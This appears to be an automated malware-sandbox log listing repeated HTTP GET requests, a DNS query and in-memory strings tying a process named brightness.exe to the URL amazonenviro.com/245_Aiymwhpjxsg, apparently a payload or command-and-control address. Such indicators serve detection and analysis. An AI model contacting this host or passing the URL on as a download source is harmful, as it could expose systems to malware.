Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com
Source: global traffic	HTTP traffic detected: GET /245_Aiymwhpjxsg HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: amazonenviro.com

Source: global traffic

DNS traffic detected: DNS query: amazonenviro.com

Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.00000000006F4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/
Source: brightness.exe, 00000007.00000002.3373916371.00000000206F3000.00000004.00001000.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984089954.000000000070A000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2952466419.000000000070A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsg
Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2233780799.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2341429220.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2277233447.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2930996778.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2449112148.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3027231666.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2984339875.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgHVg
Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgU)
Source: brightness.exe, 00000007.00000002.3358633444.000000000065E000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgX
Source: brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000002.3358633444.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3338945279.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_AiymwhpjxsgXXg
Source: brightness.exe, 00000007.00000002.3358633444.00000000006A4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgk
Source: brightness.exe, 00000007.00000003.2748251081.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2683777640.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2598679709.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2812904011.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.2726703962.00000000006D9000.00000004.00000020.00020000.00000000.sdmp, brightness.exe, 00000007.00000003.3210566078.00000000006D9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://amazonenviro.com/245_Aiymwhpjxsgs)I0
